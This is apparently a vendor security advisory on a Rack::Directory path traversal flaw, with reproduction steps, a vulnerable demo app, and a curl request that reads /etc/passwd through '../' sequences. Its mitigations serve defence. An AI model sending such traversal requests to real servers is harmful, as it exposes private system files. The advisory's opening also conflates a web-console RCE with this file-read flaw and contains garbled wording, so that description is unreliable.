Ruby on Rails (often called Rails) is a web application framework written in Ruby that emphasizes convention over configuration and the principle of "don't repeat yourself" (DRY). It provides developers with a structured and efficient way to build database-backed web applications through pre-built patterns for rapid development.
The web-console gem is designed to provide an interactive Ruby console in the browser during development. However, due to improper access control, certain versions allowed unauthorized remote access through directory traversal, thereby enabling Remote Code Execution (RCE).
Remote code execution flaws are among the Top 10 Open Web Application Security Project (OWASP) vulnerabilities. They are among the most potentially damaging of vulnerabilities because injected, remotely executed code:
- can access internal application objects/methods
- can often bypass security controls
- may persist across sessions
- can often pivot to gain OS-level access.
Details
Module Info
- Product: Ruby on Rails Framework
- Affected packages: rack
- GitHub repository:
https://github.com/rack/rack - Published package: The individual rack gem or the entire Rails Framework (which includes rack).
- Package manager: gem
Vulnerability Info
If certain directories exist in a directory that is managed by Rack::Directory, an attacker could, using this vulnerability, read the contents of files on the server that were outside of the root specified in the Rack::Directory initializer.
An attacker could read arbitrary files on the server, potentially accessing sensitive information not intended for public exposure.
Steps To Reproduce
1. Install a version of Rack that contains this vulnerability, such as 2.1.2:
gem install rack -v 2.1.2
2. Create a simple Rack application Using Rack::Directory by creating a file named vulnerable_app.rb:
require 'rack'
app = Rack::Builder.new do
use Rack::Directory, Dir.pwd # Serves the current directory
run lambda { |env| [200, { 'Content-Type' => 'text/plain' }, ['Hello from Rack!']] }
end
Rack::Handler::WEBrick.run app, Port: 9292
This app exposes the current directory and its contents over HTTP.
3. Start the vulnerable server:
ruby vulnerable_app.rb
4. Exploit the path traversal vulnerability by attempting to read /etc/passwd:
curl http://localhost:9292/../../../../../../etc/passwd
5. Observe incorrect access to the requested file.
Addressing the Issue
Until you are unable to upgrade immediately, avoid using Rack:Directory. For instance, you can write a custom directory listing controller to obtain a list of files. To replace Rack:Directory’s file serving, you can use Rack::Static.
Credits
Mitigation
Users of affected versions of Ruby on Rails should follow one of the following mitigations:
- Upgrade to a corrected version.
- Leverage a commercial support partner like HeroDevs for post-EOL security support.
